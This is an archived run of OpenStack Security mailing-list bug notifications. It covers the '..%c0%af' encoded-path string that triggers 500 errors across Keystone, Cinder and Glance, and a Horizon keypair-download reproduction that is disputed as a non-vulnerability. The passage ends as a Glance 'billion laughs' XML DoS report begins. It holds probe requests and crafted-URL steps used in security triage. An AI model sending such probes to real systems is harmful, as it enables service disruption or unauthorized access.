self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/request_id.py", line 37, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 81, in __call__ return self._error(ex, req) File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 56, in _error msg_dict = dict(url=req.url, status=status) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url url = self.path_url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url bpath_info = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.228 INFO eventlet.wsgi.server [req-7ec3610c-9cdc- 4f7d-b69c-36c385d0fa10 admin] 10.0.2.2 "POST /v2/..%c0%af/backups HTTP/1.1" status: 500 len: 139 time: 0.0827849 ===================================================== Example traceback from Glance ===================================================== 2016-09-28 00:11:55.844 32495 INFO eventlet.wsgi.server [-] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py", line 481, in handle_one_response result = self.application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 126, in __call__ response = req.get_response(self.application) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send application, catch_exc_info=False) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application app_iter = application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = self.call_func(req, *args, **self.kwargs) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func return self.func(req, *args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/base.py", line 123, in __call__ response = self.process_request(req) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 148, in __call__ return self.func(req, *args, **kw) File "/usr/local/lib/python2.7/dist-packages/oslo_middleware/healthcheck/__init__.py", line 361, in process_request if req.path != self._path: File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 485, in path bpath = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 13: invalid start byte 2016-09-28 00:11:55.854 32495 INFO eventlet.wsgi.server [-] 10.0.2.2 - - [28/Sep/2016 00:11:55] "GET /v2/images/..%c0%af/tags/..%c0%af HTTP/1.1" 500 139 0.043949 I'm not sure whether right approach here is to file a bug with webob (looks like there are several that haven't been resolved yet [1] [2]), or to fix this in each project's respective wsgi error-handling code. [1] https://github.com/Pylons/webob/issues/115 [2] https://github.com/Pylons/webob/issues/161 ** Bug watch added: github.com/Pylons/webob/issues #115 https://github.com/Pylons/webob/issues/115 ** Bug watch added: github.com/Pylons/webob/issues #161 https://github.com/Pylons/webob/issues/161 ** Summary changed: - String "..%c0%af" causes 500 errors in multiple locations in Keystone v3 + String "..%c0%af" causes 500 errors in multiple locations ** Also affects: neutron Importance: Undecided Status: New ** Also affects: glance Importance: Undecided Status: New ** Also affects: cinder Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: New Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. ========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From 1613901 at bugs.launchpad.net Wed Sep 28 01:05:23 2016 From: 1613901 at bugs.launchpad.net (Armando Migliaccio) Date: Wed, 28 Sep 2016 01:05:23 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928010524.27240.10212.malone@chaenomeles.canonical.com> I am unclear to where the issue lies, but should this be fixed centrally rather than being delegated to the individual projects? ** Changed in: neutron Status: New => Incomplete -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: New Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: Incomplete Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. ========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From sean_mcginnis at dell.com Wed Sep 28 01:23:05 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Wed, 28 Sep 2016 01:23:05 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928012305.23585.73308.malone@gac.canonical.com> This does seem like something that should be fixed centrally. Otherwise this will pop up repeatedly as projects come and go. ** Changed in: cinder Status: New => Incomplete -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1613901 Title: String "..%c0%af" causes 500 errors in multiple locations Status in Cinder: Incomplete Status in Glance: New Status in OpenStack Identity (keystone): Confirmed Status in neutron: Incomplete Status in OpenStack Security Advisory: Won't Fix Bug description: While doing some testing on Keystone using Syntribos (https://github.com/openstack/syntribos), our team (myself, Michael Dong, Rahul U Nair, Vinay Potluri, Aastha Dixit, and Khanak Nangia) noticed that we got 500 status codes when the string "..%c0%af" was inserted in various places in the URL for different types of requests. Here are some examples: ========= DELETE /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] Content-Length: 0 HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:04:27 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-238fd5a9-be45-41f2-893a-97b513b27af3 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= PATCH /v3/policies/..%c0%af HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 Content-type: application/json X-Auth-Token: [REDACTED] Content-Length: 70 {"type": "--serialization-mime-type--", "blob": "--serialized-blob--"} HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:05:36 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-57a41600-02b4-4d2a-b3e9-40f7724d65f2 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= GET /v3/domains/0426ac1e48f642ef9544c2251e07e261/groups/..%c0%af/roles HTTP/1.1 Host: [REDACTED]:5000 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.0 X-Auth-Token: [REDACTED] HTTP/1.1 500 Internal Server Error Date: Tue, 16 Aug 2016 22:07:09 GMT Server: Apache/2.4.7 (Ubuntu) Vary: X-Auth-Token X-Distribution: Ubuntu x-openstack-request-id: req-02313f77-63c6-4aa8-a87e-e3d2a13ad6b7 Content-Length: 143 Connection: close Content-Type: application/json {"error": {"message": "An unexpected error prevented the server from fulfilling your request.", "code": 500, "title": "Internal Server Error"}} ========= I've marked this as a security issue as a precaution in case it turns out that there is a more serious vulnerability underlying these errors. We have no reason to suspect that there is a greater vulnerability at this time, but given the many endpoints this seems to affect, I figured caution was worthwhile since this may be a framework-wide issue. Feel free to make this public if it is determined not to be security-impacting. Here is a (possibly incomplete) list of affected endpoints. Inserting the string "..%c0%af" in any or all of the spots labeled "HERE" should yield a 500 error. As you can see, virtually all v3 endpoints exhibit this behavior. ========= [GET|PATCH|DELETE] /v3/endpoints/[HERE] [GET|PATCH] /v3/domains/[HERE] GET /v3/domains/[HERE]/groups/[HERE]/roles [HEAD|PUT|DELETE] /v3/domains/[HERE]/groups/[HERE]/roles/[HERE] GET /v3/domains/[HERE]/users/[HERE]/roles [HEAD|DELETE] /v3/domains/[HERE]/users/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/groups/[HERE] [HEAD|PUT|DELETE] /v3/groups[HERE]/users/[HERE] [POST|DELETE] /v3/keys/[HERE] [GET|PATCH|DELETE] /v3/policies/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/endpoints/[HERE] [GET|HEAD] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/policy [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/[HERE] [GET|PUT|DELETE] /v3/policies/[HERE]/OS-ENDPOINT-POLICY/services/regions/[HERE] [GET|PATCH|DELETE] /v3/projects/[HERE] [DELETE|PATCH] /v3/projects/[HERE]/cascade GET /v3/projects/[HERE]/groups/[HERE]/roles GET /v3/projects/[HERE]/users/[HERE]/roles [HEAD|PUT|DELETE] /v3/projects/[HERE]/groups/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/regions/[HERE] [PATCH|DELETE] /v3/roles/[HERE] [GET|PATCH|DELETE] /v3/services/[HERE] [GET|PATCH|DELETE] /v3/users/[HERE] GET /v3/users/[HERE]/groups POST /v3/users/[HERE]/password GET /v3/users/[HERE]/projects GET /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE]/roles/[HERE] [GET|PATCH|DELETE] /v3/OS-OAUTH1/consumers/[HERE] [GET|DELETE] /v3/OS-OAUTH1/users/[HERE]/access_tokens/[HERE] To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1613901/+subscriptions From tdecacqu at redhat.com Wed Sep 28 02:10:39 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Wed, 28 Sep 2016 02:10:39 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928021039.18181.18494.malone@wampee.canonical.com> Removed the security tags since it's a class E (or at best class D) according to the VMT taxonomy: https://security.openstack.org/vmt- process.html#incident-report-taxonomy. ** Information type changed from Public Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags removed: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Wed Sep 28 13:39:17 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 13:39:17 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928133918.17463.55080.launchpad@wampee.canonical.com> ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From dstanek at dstanek.com Wed Sep 28 14:09:32 2016 From: dstanek at dstanek.com (David Stanek) Date: Wed, 28 Sep 2016 14:09:32 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928140932.27549.11940.malone@chaenomeles.canonical.com> Is there actually a keystone issue here? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Wed Sep 28 14:35:16 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 28 Sep 2016 14:35:16 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928143516.17539.55575.malone@wampee.canonical.com> Sounds like if there is a bug here, it's one in horizon which might be "fixed" to just fail the download if the URL has been crafted in the described manner rather than generating a new keypair and serving it. As discussed, this doesn't appear to be a vulnerability at all and is rather merely confusing/scary-looking behavior that can lead a curious user or researcher to misunderstand the underlying implementation and think it's vulnerable. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From lhinds at redhat.com Wed Sep 28 16:47:25 2016 From: lhinds at redhat.com (Luke Hinds) Date: Wed, 28 Sep 2016 16:47:25 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160928164727.27240.25916.malone@chaenomeles.canonical.com> I was not able to replicate this. When i use the download url from step 5 in a new window, it results in ' Unable to create key pair: Key pair 'test-luke' already exists. (HTTP 409)' I could not understand step 8 too well. Does 'select' mean the radio button, or just note down the name of another key set? Maybe I misread the test conditions to replicate this. Is there any session expiry at play here, with the keys are only available within the current users session? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From charles.neill at rackspace.com Wed Sep 28 20:37:31 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 20:37:31 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928203731.17427.36773.malone@wampee.canonical.com> I'm not sure I agree with the assessment that this isn't default functionality. The only thing required to enable the vulnerability is to specify an appropriate "work_dir" in Glance's configuration. If this is an unlikely or unreasonable thing to do, then I agree that this is a less severe issue. It is admittedly admin-only functionality, may not be widely used, and might be seen as deprecated by the project team, but the documentation on Tasks (which is one mechanism at play in this bug) does not in any way note that it is pending deprecation [1]. Neither are OVA/OVF images mentioned as deprecated. There are public YouTube videos explaining how to import these images [2], suggesting that at least some people are interested in using this functionality. Not trying to be alarmist, just trying to better understand the classification. [1] 